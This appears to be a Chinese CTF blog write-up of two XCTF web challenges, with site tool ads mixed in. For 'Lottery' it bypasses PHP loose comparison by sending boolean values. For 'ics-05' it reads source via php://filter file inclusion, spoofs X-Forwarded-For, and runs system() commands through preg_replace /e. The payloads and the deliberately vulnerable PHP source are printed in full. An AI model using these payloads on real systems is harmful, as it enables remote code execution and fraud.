攻防世界中的两个 Web 安全题目。Lottery 题目利用 PHP 弱类型比较特性(==),通过传入布尔值 true 绕过数字校验获取高额奖金。ics-05 题目结合文件包含漏洞与 php://filter 伪协议读取源码,发现 preg_replace 函数使用/e 修饰符导致的远程代码执行风险,最终通过构造参数执行 system 命令获取 flag。
打开靶场后发现加载缓慢,并提供了源码。这是一个类似猜数字的游戏,选对 7 个号码即可得到相应奖励。
注册后随便输入 7 个数字发现未中奖。
尝试访问其他功能发现获取 flag 需要对应余额。
思路是利用抓包修改余额。
直接修改页面数字刷新后会变回原值,此路不通。
查看猜数字页面的 api.php 代码审计。
核心逻辑是随机生成七位数字($random_win_nums),赋值给 $win_number。关键点在于使用两个等号(==)判断传入数字和随机生成的数字,可利用 PHP 弱类型比较特性绕过验证。
微信公众号「极客日志」,在微信中扫描左侧二维码关注。展示文案:极客日志 zeeklog
解析常见 curl 参数并生成 fetch、axios、PHP curl 或 Python requests 示例代码。 在线工具,curl 转代码在线工具,online
将字符串编码和解码为其 Base64 格式表示形式即可。 在线工具,Base64 字符串编码/解码在线工具,online
将字符串、文件或图像转换为其 Base64 表示形式。 在线工具,Base64 文件转换器在线工具,online
将 Markdown(GFM)转为 HTML 片段,浏览器内 marked 解析;与 HTML转Markdown 互为补充。 在线工具,Markdown转HTML在线工具,online
将 HTML 片段转为 GitHub Flavored Markdown,支持标题、列表、链接、代码块与表格等;浏览器内处理,可链接预填。 在线工具,HTML转Markdown在线工具,online
通过删除不必要的空白来缩小和压缩JSON。 在线工具,JSON 压缩在线工具,online
//部分代码
function random_num(){
do {
$byte = openssl_random_pseudo_bytes(10, $cstrong);
$num = ord($byte);
} while ($num >= 250);
if(!$cstrong){ response_error('server need be checked, tell admin'); }
$num /= 25;
return strval(floor($num));
}
function random_win_nums(){
$result = '';
for($i=0; $i<7; $i++){
$result .= random_num();
}
return $result;
}
function buy($req){
require_registered();
require_min_money(2);
$money = $_SESSION['money'];
$numbers = $req['numbers'];
$win_numbers = random_win_nums();
$same_count = 0;
for($i=0; $i<7; $i++){
if($numbers[$i] == $win_numbers[$i]){
$same_count++;
}
}
switch ($same_count) {
case 2: $prize = 5; break;
case 3: $prize = 20; break;
case 4: $prize = 300; break;
case 5: $prize = 1800; break;
case 6: $prize = 200000; break;
case 7: $prize = 5000000; break;
default: $prize = 0; break;
}
$money += $prize - 2;
$_SESSION['money'] = $money;
response(['status'=>'ok','numbers'=>$numbers, 'win_numbers'=>$win_numbers, 'money'=>$money, 'prize'=>$prize]);
}
利用 BP 拦截回应包,将 numbers 字段修改为布尔值数组,利用 PHP 弱类型比较成功获得奖金。
将 numbers 字段修改为
[true, true, true, true, true, true, true]
成功拿到 flag。
打开页面如下所示。
点击发现只有特定页面可打开,查看源代码发现一个 href 链接。
打开后无明显内容,修改参数为 index.php 回显 Ok,说明存在文件包含漏洞。
读取文件使用伪协议:php://filter/read=convert.base64-encode/resource=index.php
复制 base64 解密后观察代码。
如果 IP 为 127.0.0.1 则是 admin,且使用了 preg_replace 方法。pattern 第一个参数的结尾包含了 /e 修正符的话,第二个参数会被当做 PHP 代码执行。
使用 BP 修改 IP 为 admin,添加三个参数:
?pat=/heihei/e&rep=system('find+-name+flag')&sub=heihei
需要使用 + 置换空格,得到 flag.php。
成功拿到 flag,但注意 flag 不在页面渲染中显示。
?pat=/heihei/e&rep=system('cat+./s3chahahaDir/flag/flag.php')&sub=heihei
<?php error_reporting(0); @session_start(); posix_setuid(1000); ?>
<!DOCTYPE HTML>
<html>
<head>
<meta charset="utf-8">
<meta name="renderer" content="webkit">
<meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
<link rel="stylesheet" href="layui/css/layui.css" media="all">
<title>设备维护中心</title>
<meta charset="utf-8">
</head>
<body>
<ul>
<li><a href="?page=index">云平台设备维护中心</a></li>
</ul>
<fieldset>
<legend>设备列表</legend>
</fieldset>
<table></table>
<script type="text/html">
<!-- 这里的 checked 的状态只是演示 -->
<input type="checkbox" name="sex" value="{{d.id}}" lay-skin="switch" lay-text="开 | 关" lay-filter="checkDemo" {{ d.id==1 0003 ? 'checked' : '' }}>
</script>
<script src="layui/layui.js" charset="utf-8"></script>
<script>
layui.use('table', function() {
var table = layui.table, form = layui.form;
table.render({
elem: '#test',
url: '/somrthing.json',
cellMinWidth: 80,
cols: [
[ { type: 'numbers' }, { type: 'checkbox' }, { field: 'id', title: 'ID', width: 100, unresize: true, sort: true }, { field: 'name', title: '设备名', templet: '#nameTpl' }, { field: 'area', title: '区域' }, { field: 'status', title: '维护状态', minWidth: 120, sort: true }, { field: 'check', title: '设备开关', width: 85, templet: '#switchTpl', unresize: true } ]
],
page: true
});
});
</script>
<script>
layui.use('element', function() {
var element = layui.element;
//导航的 hover 效果、二级菜单等功能,需要依赖 element 模块
//监听导航点击
element.on('nav(demo)', function(elem) {
//console.log(elem)
layer.msg(elem.text());
});
});
</script>
<?php
$page = $_GET[page];
if (isset($page)) {
if (ctype_alnum($page)) {
?>
<br /><br /><br /><br />
<div>
<p><?php echo $page; die();?> </p>
<br /><br /><br /><br />
<?php
}else{
?>
<br /><br /><br /><br />
<div>
<p>
<?php
if (strpos($page, 'input') > 0) { die(); }
if (strpos($page, 'ta:text') > 0) { die(); }
if (strpos($page, 'text') > 0) { die(); }
if ($page === 'index.php') { die('Ok'); }
include($page); die();
?>
</p>
<br /><br /><br /><br />
<?php
}}
//方便的实现输入输出的功能,正在开发中的功能,只能内部人员测试
if ($_SERVER['HTTP_X_FORWARDED_FOR'] === '127.0.0.1') {
echo "<br >Welcome My Admin ! <br >";
$pattern = $_GET[pat];
$replacement = $_GET[rep];
$subject = $_GET[sub];
if (isset($pattern) && isset($replacement) && isset($subject)) {
preg_replace($pattern, $replacement, $subject);
}else{
die();
}
}
?>
</body>
</html>
本文分析了攻防世界中的两个 Web 安全题目。Lottery 题目利用 PHP 弱类型比较特性(==),通过传入布尔值 true 绕过数字校验获取高额奖金。ics-05 题目结合文件包含漏洞与 php://filter 伪协议读取源码,发现 preg_replace 函数使用/e 修饰符导致的远程代码执行风险,最终通过构造参数执行 system 命令获取 flag。